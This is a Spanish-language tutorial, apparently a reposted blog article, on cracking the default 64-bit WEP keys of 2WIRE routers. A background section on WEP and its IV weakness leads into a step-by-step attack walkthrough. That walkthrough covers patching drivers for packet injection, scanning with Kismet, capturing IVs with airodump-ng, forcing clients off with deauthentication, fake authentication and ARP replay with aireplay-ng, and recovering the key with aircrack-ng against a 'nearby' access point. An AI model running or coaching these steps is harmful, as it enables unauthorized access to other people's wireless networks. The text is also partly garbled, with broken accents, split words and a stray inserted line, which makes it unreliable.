Cracking 2WIRE's Routers by Crypkey
Cracking 2WIRE's Routers by Crypkey
< crypkey at gmail dot com >
Jorge Trujillo www.zonartm.org
==========================================================
Index
0.- Introducci~n
1.- Entendiendo W3P
2.- Requerimientos
3.- Configurando e instalando
4.- 2W1R3 W3P 0wn3d!
5.- Agradecimientos
6.- Referencias
Introducci~n
RTM Security no se hace responsable por el uso de este documento, este texto
esta tiene como lucro la educaci~n y el conocimiento.
Este documento primero da una pequeña introducci~n al algoritmo de cifrado
W3P que usan la mayor~a de los routers, un buen ejemplo son los famosos
2WIRE's. Entender~n que es W3P, como funciona y por que es tan vulnerable.
Asimismo el documento esta enfocado en el cracking de la llave WEP de
routers 2WIRE's con una tarjeta wireless y un programa que mas adelante se
hablara.
1.- Entendiendo
WEP Bueno vamos a dar una pequeña introducci~n a WEP de su funcionamiento
entre otras cosas que ver~n a continuaci~n. WEP (Wired Equivalent Privacy) es el algoritmo opcional de seguridad para brinda r "protecci~n " a las redes inal~mbricas, incluido en la primera versi~n del est~ndar IEEE 802.11, mantenido sin cambios en las nuevas 802,11a
y 802.11b, con el fin de garantizar compatibilidad entre distintos
fabricantes.
El WEP es un sistema de cifrado est~ndar implementado en la
MAC y soportado por la mayor~a de las soluciones inal~mbricas, supongo que
hasta aqu~ vamos bien, pasemos a la parte de cifrado.
Cifrado:
WEP utiliza una clave secreta compartida entre una estaci~n inal~mbrica
Illustrated, Volume 1 The Protocols (Richard Stevens, Addison-Wesley)
y un punto de acceso. Todos los datos enviados y recibidos entre la estaci~n y el
punto de acceso pueden ser cifrados utilizando esta clave compartida. El est~ndar
802.11 no especifica c~mo se establece la clave secreta, pero permite que haya
una tabla que asocie una clave exclusiva con cada estaci~n. En la pr~ctica
general, sin embargo, una misma clave es compartida entre todas las estaciones y
puntos de acceso de un sistema dado.
Para proteger el texto cifrado frente a modificaciones no autorizadas mientras
est~ en tr~nsito, WEP aplica un algoritmo de comprobaci~n de integridad
(CRC-32) al texto en claro, lo que genera un valor de comprobaci~n de
integridad (ICV). Dicho valor de comprobaci~n de integridad se concatena con el
texto en claro. El valor de comprobaci~n de integridad es, de hecho, una
especie de huella digital del texto en claro. El valor ICV se añade al texto
cifrado y se env~a al receptor junto con el vector de inicializaci~n. El
receptor combina el texto cifrado con el flujo de clave para recuperar el
texto en claro. Al aplicar el algoritmo de integridad al texto en claro y
comparar la salida con el vector ICV recibido, se puede verificar que el
proceso de descifrado ha sido correcto ~ que los datos han sido
corrompidos. Si los dos valores de ICV son id~nticos, el mensaje ser~
autenticado y woala!
Autenticaci~n:
WEP proporciona dos tipos de autenticaci~n: un sistema abierto, en el que todos
los usuarios tienen permiso para acceder a la WLAN, y una autenticaci~n mediante
clave compartida, que controla el acceso a la WLAN y evita accesos no autorizados
a la red. De los dos niveles, la autenticaci~n mediante clave compartida es el
modo "seguro ". E n ~l se utiliza una clave secreta com partid a entre tod as las
estaciones y puntos de acceso del sistema WLAN. Cuando una estaci~n trata de
conectarse con un punto de acceso, ~ste replica con un texto aleatorio, que
constituye el challenge. La estaci~n debe utilizar la copia de su clave secreta
compartida para cifrar el texto de desaf~o y devolverlo al punto de acceso, con
el fin de autenticarse. El punto de acceso descifra la respuesta utilizando la
misma clave compartida y compara con el texto de desaf~o enviado anteriormente.
Si los dos textos son id~nticos, el punto de acceso env~a un mensaje de
confirmaci~n a la estaci~n y la acepta dentro de la red. Si la estaci~n no
dispone de una clave, o si env~a una respuesta incorrecta, el punto de acceso la
rechaza, evitando que la estaci~n acceda a la red.
Es bueno asegurarse de que WEP est~ habilitado siempre que se requiera un
mecanismo de autenticaci~n seguro. Incluso, aunque est~ habilitada la
autenticaci~n mediante clave compartida, todas las estaciones inal~mbricas de
un sistema WLAN pueden tener la misma clave compartida, dependiendo de c~mo
se haya instalado el sistema.
En tales redes, no es posible realizar una autenticaci~n individualizada;
todos los usuarios, incluyendo los no autorizados, que dispongan de la
clave compartida podr~n acceder a la red. Esta debilidad puede tener
como resultado accesos no autorizados, especialmente si el sistema incluye
un gran n~mero de usuarios. Cuantos m~s usuarios haya, mayor ser~ la
probabilidad de que la clave compartida pueda caer en manos inadecuadas, que
es lo que haremos en el capitulo 4, pero veamos un poco mas de WEP y su
algoritmo.
Algoritmos
El algoritmo de encriptaci~n utilizado es RC4 con claves (seed), seg~n el
est~ndar, de 64 bits. Estos 64 bits est~n formados por 24 bits
correspondientes al vector de inicializaci~n m~s 40 bits de la clave secreta.
Los 40 bits son los que se deben distribuir manualmente.
Veamos con funciona WEP:
1. Se calcula un CRC de 32 bits de los datos. Este CRC-32 es el metodo que
propone WEP para garantizar la integridad de los mensajes (ICV,
Integrity Check Value).
2. Se concatena la clave secreta a continuaci~n del IV formado el seed.
3. El PRNG (Pseudo-Random Number Generator) de RC4 genera una secuencia de
caracteres pseudoaleatorios (keystream) a partir del seed de la misma longitud
que los bits obtenidos en el punto 1.
4. Se calcula la O exclusiva (XOR) de los caracteres del
punto 1 con los del punto 3. El resultado es el mensaje cifrado.
5. Se env~a el IV (sin cifrar) y el mensaje cifrado dentro del campo de datos
(frame body) de la trama IEEE 802.11.
ver [ crack_wep-000001 ]
El algoritmo para descifrar es similar al anterior. Debido a que el otro extremo
conocer~ el IV y la clave secreta, tendr~ entonces el seed y con ello podr~
generar el keystream. Realizando el XOR entre los datos recibidos y el keystream
se obtendr~ el mensaje sin cifrar (datos y CRC-32), luego se comprueba que el
CRC-32 es correcto.
Ahora veamos por que WEP es vulnerable, que hace que teniendo cualquier numero
de bits de key se pueda romper, as~ que analicemos un poco m~s a fondo esto.
Vulnerabilidad WEP
La implementaci~n del vector de inicializaci~n (IV) en el algoritmo WEP tiene
varios problemas de seguridad. Recordemos que el IV es la parte que var~a de
la clave (seed) para impedir que un posible atacante recopile suficiente
informaci~n cifrada con una misma clave.
Sin embargo, el est~ndar 802.11 no especifica c~mo manejar el IV; se
indica que deber~a cambiarse en cada trama para mejorar la privacidad, pero no
obliga a ello. Queda abierta a los fabricantes la cuesti~n de c~mo variar el
IV en sus productos. La consecuencia de esto es que buena parte de las
implementaciones optan por una soluci~n sencilla: cada vez que arranca una
tarjeta wireless, se fija el IV a 0 y se incrementa en 1 para cada trama. Esto
ocasiona que las primeras combinaciones de IVs y clave secreta se repitan muy
frecuentemente. M~s a~n, si tenemos en cuenta que cada estaci~n utiliza la
misma clave secreta, por lo que las tramas con igual clave se multiplican en el
medio. Por otro lado, el n~mero de IVs diferentes no es demasiado elevado
(2^24=16 millones aprox.), por lo que terminar~n repiti~ndose en cuesti~n de
minutos u horas. El tiempo ser~ menor cuanto mayor sea la carga de la red. Lo
ideal ser~a que el IV no se repitiese nunca, pero como vemos, esto es imposible
en WEP. La cantidad de veces que se repite un mismo IV depender~ de la
implementaci~n elegida para variar el IV por el fabricante (secuencial,
aleatoria, etc.) y de la carga de la red.
La longitud de 24 bits para el IV forma parte del est~ndar y no puede cambiarse;
existen implementaciones con claves de 128 bits (lo que se conoce como WEP2),
sin embargo, en realidad lo ~nico que se aumenta es la clave secreta (104 bits)
pero el IV se conserva con 24 bits. El aumento de la longitud de la clave
secreta no soluciona la debilidad del IV.
Si se han capturado varias tramas con igual IV, es decir, con igual keystream,
solo se necesita conocer el mensaje sin cifrar de una de ellas, haciendo el XOR
entre un mensaje sin cifrar y el mismo cifrado, nos dar~ el keystream para
ese IV. Conociendo el keystream asociado a un IV, se puede descifrar todas las
tramas que usen el m ism o IV y asi poder descifrar la grandiosa "shared key".
Espero que no se hayan perdido, aunque me parece muy facil de entender todo lo
que se explico sobre WEP y ya una ves entendido como funciona este sistema de
cifrado pasemos a la parte interesante de este documento donde se demuestra como
romper la llave de los famosos routers 2WIRE de prodigy infinitum y en dicho
caso de cualquier router con WEP habilitado.
2.- Requerimientos
Antes de empezar todo este rollo, veamos lo que necesitan para romper una
llave WEP, asi que revisemos lo que necesitamos y los puntos que est~n
en negritas es que son sumamente importantes:
1 .- Sistema Linux ( Mandriva, Gentoo, Ubuntu, Backtrack etc. )
2.- Tener un 2WIRE Access Point cercano o al menos con buena señal.
3.- Tarjeta inalambrica con chip Atheros o compatible con packet injection y
monitor mode.
4.- Aircrack instalado ( http://www.aircrack-ng.org )
5.- Suerte y paciencia.
Si necesitan saber que tarjeta comprar vayan a la siguiente pagina web:
http://aircrack-ng.org/doku.php?id=faq#which_is_the_best_card_to_buy
Si necesitan saber si su tarjeta es compatible con el paquete aircrack vayan a la
siguiente pagina web:
http://aircrack-ng.org/doku.php?id=compatibility
No tienen idea por que no funciona su tarjeta o que demonios pasa con
aircrack, vayan a las siguientes paginas web y pregunten sus dudas:
http://www.zonartm.org/board
http://forum.tinyshell.be/
http://madwifi.org/report
Asi que si tiene cualquier duda sobre cual es la mejor distribuci~n, cuanto
cuestan las tarjetas o si esta tarjeta que voy a comprar soporta lo que me
piden etc. No duden en preguntar en el foro de RTM Security o en dicho caso
mandarme un mail, asi que no tengan pena por preguntar.
Ya una ves dicho todo esto, espero que cumplan con todos los requerimientos
que se piden, que no son muchos, igual lo mas complicado de encontrar
seria la tarjeta wireless, pero pueden buscar en buscadores como google,
foros etc.
Pasemos a la parte donde se configura la tarjeta wireless y as~ como aplicando
el patch para que soporte packet injection. En cuanto a aircrack no creo
que haya mucho problema con la instalaci~n pero lo revisaremos de todos modos.
3.- Configurando e Instalando
Bueno ya para hacer esto r~pido, vamos al grano. En este caso estoy usando una
tarjeta Atheros con un chip Atheros ( AR5006EG ) y Ubuntu. El controlador para
esta tarjeta es madwifi y su ultima versi~n es 0.9.2 y necesitamos aplicar el
patch que aircrack nos da para poder realizar packet injection ( que despu~s
veremos ) para poder realizar nuestros ataques, vamos por pasos para que no se
pierdan:
1.- Abran su terminal y pongan sudo -H s (metan su contraseña) para convertirse
en root.
2.- ifconfig ath0 down
3.- rmmod ath_pci ath_rate_sample ath_hal wlan_scan_sta wlan 2>/dev/null
4.- svn checkout http://svn.madwifi.org/trunk/ madwifi-ng o bajen el snapshot directo de la pagina
5.- wget http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
6.- cd madwifi-ng ; patch -Np1 -i ../madwifi-ng-r1679.patch
7.- make ; make install
8.- Si la instalaci~n les pide rem over los m ~dulos anteriores o viejos presionen "r".
9.- depmod -ae ; modprobe ath_pci
10.- A veces es recomendable reiniciar el sistema.
Ahora vamos a instalar aircrack ;)
1.- Abran su terminal
2.- wget http://download.aircrack-ng.org/aircrack-ng-0.6.2.tar.gz
3.- cd aircrack-ng-0.6.1
4.- ./configure ; make
5.- sudo make install
6.- Prueben si ya esta instalado:
pongan en la terminal aircrack-ng
Y espero que todo les haya salido muy bien para poder llegar a la siguiente
configuraci~n de la tarjeta que es ponerla en Monitor Mode, pero primero debemos
saber en que canal esta el router 2WIRE as~ que primero hagamos lo
siguiente:
1.- ifconfig ath0 up
2.- iwlist ath0 scan
3.- El canal se vera en esta l~nea Frequency:2.437 GHz (Channel 6) < - Ejemplo
Ya sabemos el canal del AP, as~ que usemos ahora airmon-ng:
1.- airmon-ng start ath0 6
2.- Se creara una interfaz llamada ath1
3.- E n otras tarjetas sim plem ente pongan "iw config ethX m ode m onitor" y aparecer~
Mode: Monitor.
Nota: En el primer p aso ten g an en cu en ta q u e yo p u se el n u m ero "6" p
or q u e ese es el can al el cu al el Access Point esta transmitiendo, asi que
puede variar en el suyo.
En caso de que no funcione el monitor mode de airmon-ng como de costumbre
vamos hacerlo a mano.
1.- wlanconfig ath create wlandev wifi0 wlanmode monitor ; ifconfig ath1 up
2.- echo '804' > /proc/sys/net/ath0/dev_type
3.- Verifiquen el Monitor mode en ath1
Hasta ahora lo ~nico que hemos hecho es configurar nuestra tarjeta inal~mbrica
para soportar packet injection, as~ como tambi~n instalar aircrack, el software
para romper la llave WEP y por ultimo simplemente poner nuestra tarjeta en el
canal del Access Point y en modo Monitor. Ahora si empecemos con la parte
interesante de este documento.
4.- 0wn1ng W3P
Ahora si han de decir, por fin la parte buena. Pues si, de hecho si esta es la
parte mas interesante y me parece donde a la mayor~a les interesa, as~ que
empecemos de una ves. Yo creo que son pocos los pasos que se tiene que seguir
para poder crackear esta madre, empecemos con abrir su terminal y hacemos un
sudo -H -s para convertirnos en root (recuerden ya debemos tener nuestra
interfaz inal~mbrica en m odo "M on itor"). S i quieren pueden crear una
carpeta llamada WEP para tener ah~ los IVS y los archivos que vayamos generando
;). Lo que hare primero para ver si hay clientes asociados con el Access
Point 2WIRE yo utilizo Kismet ya que es mas preciso que el paquete airodump-ng
para ver los clientes asociados aunque algunos prefieres airodump-ng, en
fin como ustedes quieran.
Nota: Aviso que puede tomar horas el recoger 300,000 IV's, asi que
tengan paciencia.
1.- mkdir wep
2.- nano /etc/kismet/kismet.conf
3.- E ditar la linea source de la siguiente manera; "source= m adw ifi_ag,w ifi0,atheros"
Nota:
madwifi_ag puede variar por el soporte que tenga su tarjeta vean README para
poder ver exactamente que sourcetype tienen.
4.- ejecutamos: kismet y tengan a la mano una l~piz o abran un nuevo documento
para ir pegando los datos. Oprimim os la letra "S " y despu~s elegimos la
opci~n "w ".
5.- Veremos la pantalla siguiente: Por razones de privacidad los
nombres ESSID,BSSID, IP's, MAC address, etc.. cambiaran de nombre.
ver [ crack_wep-000008 ]
6.- Despu~s podemos movernos con las flechas arriba, abajo sobre los Access
Point que detecta kismet, elegim os en este caso "IN F IN IT U M X X X " y oprim
im os la tecla "enter" qu e nos m ostrara la informaci~n del Access Point, en
este caso el BSSID.
Nota: Podemos tambi~n poner un lock channel con Kismet para que solo la interfaz escuche
conexiones en el canal que queramos, hay que hacer un Lock, oprimimos Shift+L y listo.
ver [ crack_wep-000009 ]
7.- Anotamos el BSSID del Access Point en este caso usare: 00:13:95:D5:F1:31 en
donde quieran en un archivo gedit o abran una nueva term inal y abran "nan o w
hatever" y ah~ peguen el BSSID, que ser~ de buen uso despu~s.
8.- Hay que volver al men~ principal solo oprim an la tecla "q" y regresaran, a
hora sobre el mismo Access Point que hab~amos elegido ahora apretamos la tecla
"c" y verem os los clientes conectados al Access Point.
ver [ crack_wep-000010 ]
9.- H ay que anotar de nuevo en tu archivo "w hatever" que creaste o donde este
peg ando todo los datos, la MAC del cliente que esta conectado al AP. En este
caso utilizaremos 00:0C:F9:4E:42:A2
10.- Ahora algunos dir~n ¿ que dem onios es la "T " que ap arece a lado del M
ac Address? y por que abajo hay una "F ", buen o si presionan "h " podr~n ver su
respuesta, pero para ahorrarles tiempo F significa el cliente esta en LAN o
por cablecito y cuando vean una "T " o "E " p or lo regular son clientes
conectados por wireless, al parecer aqui tenemos 2 clientes conectados
mediante cable, as~ que no creo que sean muy ~til por lo tanto haremos un
falsificaci~n de un usuario al AP para as~ poder realizar nuestros
ataques. Pero primero pasemos a la etapa de cuando si tienen clientes
conectado mediante wireless y usaremos la misma MAC para el ejemplo.
11.- Pueden dejar su kismet abierto para ver si los clientes se desconectan o
que nuevos clientes se conectan tambi~n, pero si gustan pueden cerrar su
kismet y cuando corramos airodump-ng tambi~n podremos ver los clientes
conectados con al AP.
Cracking 2WIRE's con clientes (si no tienen, s~ltense todo esto) Lo primero que
debemos tener es a mano las MAC Address que tomamos de nuestro hermoso kismet as~
como tambi~n el BSSID del Access Point que vamos a crackear ;). En este caso
utilizaremos la BSSID 00:13:95:D5:F1:31 y nuestro cliente 00:0C:F9:4E:42:A2.
1.- Abrimos nuestra terminal y ejecutamos: airodump-ng --ivs -w ownage-c 6 ath1
"airodum p-n g " es nuestro sniffe r que capturara los paquetes IVs para poder
crackear la clave ;).
"---ivs" es la sentencia para capturar solo paquetes IV S .
"-w" es para escribir el nom bre del archivo donde se guardara n todos esos
paquetes.
"-c" es el canal donde espec~ficamente esta al AP, en este caso el
canal 6.
"ath1" en este caso es la interfaz que tenem os en m odo Monitor.
Mantengan esta ventana abierta y vean el numero de paquetes o datos que va
enviando el cliente al AP, esto son los IV's, pero para hacer mas r~pido el
cracking de la llave seguiremos con lo siguiente.
2.- Abrimos una solapa dentro
de la terminal u otra terminal, como gusten, y escriban PERO NO EJECUTEN:
aireplay-ng -e INFINITUM -a 00:13:95:D5:F1:31 -c 00:0C:F9:4E:42:A2 --deauth 10 ath1
"aireplay-ng " es nuestro program a que inyecta paquetes al A P para generar
trafico (IV ' s)
"-e IN F IN IT U M " en esta opci~n especificamos el nombre del
ESSID del AP.
"-a 00:13:95:D5:F1:31" la B S S ID o M ac A ddress de nuestro A ccess P oint.
"-c 00:0C:F9:4E:42:A2" nuestro cliente que inyectara paquetes.
"--deauth 10 " el ataque que haremos que es una deautentificaci~n al cliente
conectado 10 veces.
"ath1" la interfaz en monitor mode.
3.- Abrimos otra solapa y lo que haremos a continuaci~n es generar trafico
con el Access Point para generar IV's pretendiendo ser el cliente conectado realmente
ejecutamos:
aireplay-ng --arpreplay -b 00:13:95:D5:F1:31 -h 00:0C:F9:4E:42:A2 ath1
"aireplay-ng " nuestro program a que inyecta paquetes para generar trafico.
"--arpreplay" nuestro tipo de ataque que es el inyectar paquetes ARP ,conteniend o IV ' s.
"-b 00:13:95:D5:F1:31" B S S ID o M ac A ddress del A P .
"-h 00:0C:F9:4E:42:A2" M ac A ddress del cliente conectado al A P .
"ath1" la interfaz en m onitor m ode.
Ejecutamos este comando y lo que veremos es lo sig.
ver [ crack_wep-000012 ]
Cuando ya lo hayan ejecutado v~yanse a la solapa donde dejaron el comando para
deautentificar al cliente conectado al AP y ejec~tenlo. Despu~s de eso ver~n
como los ARP requests en la solapa de arriba empezaran a aumentar y llegaran
paquetes a lo loco generando los IV's necesarios para crackear la cuenta.
4.- Cuando
sientan ustedes que ya hayan captura los IV's necesarios ejecuten, en este caso a
mi me tomo solo juntar 300,000 IV's para crackear la llave de 64 bits que por
default tienen los m~dems 2WIRE: aircrack-ng -f 4 -m 00:13:95:D5:F1:31 -n 64
*.ivs
"aircrack-ng " nuestro program a que hace el cracking de la llave.
"-f 4" llam ado fudge qu e al aum entar su valor, aum entam os la posibilidad de tener
la llave.
"-m " nu estra M ac A ddress del A P .
"-n 64 " los bits de la llave, en este caso los 2WIRE por default tienen 64 bits.
"*.ivs" todos los archivos ivs generados.
Ejecuten y BINGO! Wep Key Found!
ver [ crack_wep-000012 ]
Cracking 2WIRE's sin clientes
Pr~cticamente son casi los mismos pasos pero solo cambiaremos un poco. Otra vez utilizaremos la BSSID
00:13:95:D5:F1:31 y nuestro cliente 00:0C:F9:4E:42:A2.
1.- Abrimos nuestra terminal y ejecutamos: airodump-ng --ivs -w ownage-c 6 ath1
"airodum p-n g " es nuestro sniffer que capturara los paquetes ivs para poder crackear la cla ve ;).
"---ivs" es la sentencia para capturar solo paquetes IV S .
"-w " es para escribir el nom bre del archivo donde se guardara n todos esos paquetes.
"-c" es el canal donde espec~ficamente esta al AP, en este caso el canal 6.
"ath1" en este caso es la interfaz que tenemos en modo Monitor.
2.- Abrimos una solapa dentro de la terminal y ejecuten:
aireplay-ng -e INFINITUM -a 00:13:95:D5:F1:31 -h 00:11:22:33:44:55 fakeauth 30 ath1
"aireplay-ng " es nuestro program a que inyecta paquetes al AP para generar trafico (IV's)
"-e IN F IN IT U M " en esta opci~n especificamos el nombre del ESSID del AP.
"-a 00:13:95:D5:F1:31" la B S S ID o M ac A ddress de nuestro A ccess P oint.
"-h 00:0C:F9:4E:42:A2" M ac A ddress falsa que crearemos y autentificaremos con el AP..
"--fakeauth" el ataque que harem os que es una autentificaci~n falsa con el AP para as~ poder
inyectar paquetes con este cliente falso.
"ath1" nuestra interfaz en m onitor mode.
ver [ crack_wep-000013 ]
3.- Abrimos otra solapa y lo que haremos a continuaci~n es generar trafico con
el Access Point para generar IV's pretendiendo ser el cliente conectado
realmente ejecutamos:
aireplay-ng --arpreplay -b 00:13:95:D5:F1:31 -h 00:0C:F9:4E:42:A2 ath1
"aireplay-ng " nuestro programa que inyecta paquetes para generar trafico.
"--arpreplay" nuestro tipo de ataque que es el inyectar paquetes ARP, conteniend o IV ' s.
"-b 00:13:95:D5:F1:31" B S S ID o M ac A ddress del A P .
"-h 00:0C:F9:4E:42:A2" M ac A ddress del cliente conectado al AP.
"ath1" la interfaz en m onitor m ode. Solo es cuesti~n de tiempo para que vean el aumento
de sus ARP, pero puede tomar tiempo.
4.- Cuando sientan ustedes que ya hayan capturado los IV's necesarios ejecuten,
en este caso a mi me tomo solo juntar 300,000 IV's para crackear la llave
de 64 bits que por default tienen los m~dems 2WIRE: aircrack-ng -f 4 -m
00:13:95:D5:F1:31 -n 64 *.ivs
"aircrack-ng " nuestro program a que hace el cracking de la llave.
"-f 4" llam ado fudge que al aumentar su valor, aumentamos la posibilidad de tener la llave.
"-m " nu estra M ac A ddress del A P .
"-n 64 " los bits de la llave, en este caso los 2WIRE por default tienen 64 bits.
"*.ivs" todos los archivos ivs generados. Ejecuten y BINGO! Wep Key Found!
Agradecimientos
Bueno mas que nada les quiero mandar un saludo a Alt3kx, bro, nitr0us, OpTix, fdisk,
dex, todo RTM.
As~ que pues ojala puedan hacer un feedback del documento y que RTM
Security siga creciendo.
Saludos a Todos!
Referencias
Experiencia Propia ;D
Coldfisher, "W ireless S ecurity Black Paper", 2006
Javier Sierra; Leonardo Betancourt, "Protocolo de Seguridad WEP", 2005
http://www.wi-fiplanet.com/tutorials/article.php/1368661
1 comentario:
Si eres friki
Publicar un comentario